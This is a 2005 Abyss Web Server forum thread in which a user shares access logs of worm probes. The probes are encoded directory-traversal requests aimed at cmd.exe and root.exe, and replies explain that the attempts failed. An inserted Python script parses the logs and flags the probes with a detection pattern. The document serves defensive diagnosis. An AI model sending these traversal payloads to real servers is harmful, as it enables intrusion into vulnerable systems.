Tim1681 -
Joined: 17 Jan 2005 Posts: 160 Location: Bristol, CT, USA
|
Posted: Fri Apr 22, 2005 2:47 pm Post subject: Server Vulnerability |
|
|
Would this be a sign of server vulnerability? From my Abyss Log File ..
Code:
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.161.177 - - [22/Apr/2005:05:33:45 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""
24.2.139.197 - - [22/Apr/2005:07:02:14 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 463 "" ""
|
I don't like the way that code looks ... |
|
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
|
Posted: Fri Apr 22, 2005 3:18 pm Post subject: |
|
|
No, that would be a sign of an old IIS/Frontpage worm trying to attack your server and failing miserably because it isn't IIS/Frontpage. A quick search of the forum would have confirmed this... |
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Fri Apr 22, 2005 8:35 pm Post subject: Re: Server Vulnerability |
|
|
Tim1681,
The server answers these requests with errors 400 and 404 (which means that the server refuses to respond or simply tells the client it has made an error).
So the server is not vulnerable. It would have been so if it processed the requests and returned error 200.
_________________
Support Team
Aprelium - http://www.aprelium.com |
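The status-code check described in the reply above, applied to the log format quoted in this thread, as an added example that is not part of the original posts. The function names are hypothetical, the first four sample lines are copied from the thread, and the two `192.0.2.x` lines are constructed; a 2xx answer to a probe is marked for investigation rather than treated as proof of compromise.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Fields: host ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# File names the requests in the thread ask for.
PROBE_RE = re.compile(r'(root\.exe|cmd\.exe|fp30reg\.dll)', re.I)

SAMPLE = [  # first four lines are from the thread; the last two are constructed
    '24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 463 "" ""',
    '24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""',
    '24.2.161.177 - - [22/Apr/2005:03:41:36 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 463 "" ""',
    '24.2.139.197 - - [22/Apr/2005:07:02:14 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 463 "" ""',
    '192.0.2.10 - - [22/Apr/2005:08:00:00 -0400] "GET /index.html HTTP/1.1" 200 1024 "" ""',
    '192.0.2.20 - - [22/Apr/2005:08:05:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1500 "" ""',
]

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so %255c and %25%35%63 both end up as a backslash."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def triage(line):
    """Return (ip, verdict, decoded_path) for a probe line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path = fully_decode(target.split('?', 1)[0])
    traversal = '..\\' in path or '../' in path
    if not (traversal or PROBE_RE.search(path)):
        return None
    # 4xx: the server refused the request. 2xx: it served something, so look closer.
    verdict = {'4': 'rejected', '2': 'investigate'}.get(status[0], 'other')
    return ip, verdict, path

def summarize(lines):
    """Count verdicts per client IP across a list of log lines."""
    summary = {}
    for hit in filter(None, map(triage, lines)):
        summary.setdefault(hit[0], Counter())[hit[1]] += 1
    return summary

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE).items():
        print(ip, dict(counts))
```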
|
Tim1681 -
Joined: 17 Jan 2005 Posts: 160 Location: Bristol, CT, USA
|
Posted: Fri Apr 22, 2005 9:33 pm Post subject: |
|
|
Sweet. Thanks. I love Abyss =) :D |
|
Tim1681 -
Joined: 17 Jan 2005 Posts: 160 Location: Bristol, CT, USA
|
Posted: Fri Apr 29, 2005 12:37 am Post subject: |
|
|
Is it usual for this 'worm' to attempt to attack my server 20+ times DAILY? Because that's what it's doing .. :-/ |
|
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Fri Apr 29, 2005 4:18 pm Post subject: |
|
|
Tim1681 wrote: | Is it usual for this 'worm' to attempt to attack my server 20+ times DAILY? Because that's what it's doing .. :-/ |
It all depends on how many people have computers that are affected by this worm. Over the last years we had days where 2000 hits were due to this kind of worm and other days with no worm attacks.
Have you activated the antihacking feature in Abyss Web Server? It will help you detect these attacks and stop them to save your bandwidth.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
Tim1681 -
Joined: 17 Jan 2005 Posts: 160 Location: Bristol, CT, USA
|
Posted: Fri Apr 29, 2005 7:31 pm Post subject: |
|
|
Yeah, I have that activated; luckily Abyss isn't letting 'em get through. Thanks for the info ;-) |
|
cmxflash -
Joined: 11 Dec 2004 Posts: 872
|
Posted: Fri Apr 29, 2005 7:54 pm Post subject: |
|
|
Tim1681 wrote: | Yeah, I have that activated; luckily Abyss isn't letting 'em get through. Thanks for the info ;-) |
If it's the same person who attacks you every time, simply block his IP or IP-range, like "24.2.*.*". |
|
Tim1681 -
Joined: 17 Jan 2005 Posts: 160 Location: Bristol, CT, USA
|
Posted: Sat Apr 30, 2005 12:14 am Post subject: |
|
|
Well, it changes between 5, but I will try that later tonight. If I decided to block that IP range, many people in my area that use Comcast wouldn't be able to access my site lol =) |
|